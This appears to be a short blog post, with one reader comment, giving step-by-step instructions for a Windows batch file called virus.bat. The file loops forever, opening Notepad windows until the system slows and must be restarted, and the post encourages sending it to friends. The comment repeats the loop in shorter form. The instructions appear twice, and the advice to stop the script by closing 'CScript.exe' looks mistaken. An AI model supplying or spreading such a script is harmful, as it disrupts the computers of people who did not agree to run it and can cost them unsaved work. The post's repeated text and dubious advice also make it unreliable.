This is a simple notepad trick not a virus. But people who does not know that this is just a funny trick not a virus, they must be scare.
To do this :-
1. Open Notepad.
2. Copy the bellow box code and paste it to notepad.
3. Now save as virus.bat
4. Now open the file "virus.bat" or Send it to your friends.
Please Note - If you want to try this on your computer. Just double click on it. But beware your system will be slow down and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So if you want to try this. Save and close your all programmes. Or to stop this you just close the CScript.exe file.
To do this :-
1. Open Notepad.
2. Copy the bellow box code and paste it to notepad.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
3. Now save as virus.bat
4. Now open the file "virus.bat" or Send it to your friends.
Please Note - If you want to try this on your computer. Just double click on it. But beware your system will be slow down and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So if you want to try this. Save and close your all programmes. Or to stop this you just close the CScript.exe file.
%SystemRoot%\system32\notepad.exe is not necessary. just type notepad.effect will be same.. !!
ReplyDelete@ECHO off
:nhr
notepad
GOTO nhr